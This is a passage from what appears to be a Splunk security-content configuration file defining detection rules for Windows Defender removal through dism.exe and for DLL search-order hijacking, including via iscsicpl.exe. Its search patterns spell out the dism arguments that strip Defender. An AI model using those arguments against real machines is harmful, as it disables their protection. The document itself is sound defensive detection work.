Processes.process=*/s*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_diskshadow_proxy_execution_filter` [ESCU - Windows DISM Remove Defender - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of the Windows Disk Image Utility, `dism.exe`, to remove Windows Defender. Adversaries may use `dism.exe` to disable Defender before completing their objective. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of the Windows Disk Image Utility, `dism.exe`, to remove Windows Defender. Adversaries may use `dism.exe` to disable Defender before completing their objective. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate administrative tools leverage `dism.exe` to manipulate packages and features of the operating system. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DISM Remove Defender - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to disable Windows Defender. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DISM Remove Defender - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of the Windows Disk Image Utility, `dism.exe`, to remove Windows Defender. Adversaries may use `dism.exe` to disable Defender before completing their objective. action.notable.param.rule_title = Windows DISM Remove Defender action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dism.exe (Processes.process="*/online*" AND Processes.process="*/disable-feature*" AND Processes.process="*Windows-Defender*" AND Processes.process="*/remove*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_dism_remove_defender_filter` [ESCU - Windows DLL Search Order Hijacking Hunt - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic is an experimental query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001", "T1574"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic is an experimental query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives will be present based on paths. Filter or add other paths to the exclusion as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DLL Search Order Hijacking Hunt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land", "Windows Defense Evasion Tactics"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DLL Search Order Hijacking Hunt - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 10, "impact": 10, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001", "T1574"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name from datamodel=Endpoint.Processes where Processes.dest!=unknown Processes.user!=unknown NOT (Processes.process_path IN ("*\\system32\\*", "*\\syswow64\\*","*\\winsxs\\*","*\\wbem\\*")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | lookup hijacklibs library AS process_name OUTPUT islibrary | search islibrary = True | rename parent_process_name as process_name , process_name AS ImageLoaded, process_path AS Module_Path | `windows_dll_search_order_hijacking_hunt_filter` [ESCU - Windows DLL Search Order Hijacking Hunt with Sysmon - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic is query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001", "T1574"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic is query built against a accidental feature using the latest Sysmon TA 3.0 (https://splunkbase.splunk.com/app/5709/) which maps the module load (ImageLoaded) to process_name. This analytic will deprecate once this is fixed. This hunting analytic identifies known libraries in Windows that may be used in a DLL search order hijack or DLL Sideloading setting. This may require recompiling the DLL, moving the DLL or moving the vulnerable process. The query looks for any running out of system32 or syswow64. Some libraries natively run out of other application paths and will need to be added to the exclusion as needed. The lookup is comprised of Microsoft native libraries identified within the Hijacklibs.net project. action.escu.how_to_implement = The latest Sysmon TA 3.0 https://splunkbase.splunk.com/app/5709 will add the ImageLoaded name to the process_name field, allowing this query to work. Use as an example and implement for other products. action.escu.known_false_positives = False positives will be present based on paths. Filter or add other paths to the exclusion as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DLL Search Order Hijacking Hunt with Sysmon - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Living Off The Land", "Windows Defense Evasion Tactics", "Qakbot"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows DLL Search Order Hijacking Hunt with Sysmon - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Windows Defense Evasion Tactics", "Qakbot"], "cis20": ["CIS 10"], "confidence": 10, "impact": 10, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001", "T1574"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 NOT (process_path IN ("*\\system32\\*", "*\\syswow64\\*","*\\winsxs\\*","*\\wbem\\*")) | lookup hijacklibs library AS process_name OUTPUT islibrary | search islibrary = True |rename process_name AS ImageLoaded process_path AS Module_Path | stats count values(parent_process_name) as parent_process_name by _time dest ImageLoaded Module_Path | `windows_dll_search_order_hijacking_hunt_with_sysmon_filter` [ESCU - Windows DLL Search Order Hijacking with iscsicpl - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a recently disclosed search ordler DLL hijack in iscsicpl.exe. The malicious DLL must be in a new path and iscsicpl.exe, upon load, will execute the payload. The analytic is restricted to Windows shells. Two proof of concepts were identified and utilized to determine the behavior. The command-line is an option to go after, but most likely identifying a child process off iscsicpl.exe will be more effective. Monitoring for suspicious DLL loads is also an option. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a recently disclosed search ordler DLL hijack in iscsicpl.exe. The malicious DLL must be in a new path and iscsicpl.exe, upon load, will execute the payload. The analytic is restricted to Windows shells. Two proof of concepts were identified and utilized to determine the behavior. The command-line is an option to go after, but most likely identifying a child process off iscsicpl.exe will be more effective. Monitoring for suspicious DLL loads is also an option. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filtering may be required. Remove the Windows Shells macro to determine if other utilities are using iscsicpl.exe. action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DLL Search Order Hijacking with iscsicpl - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] ac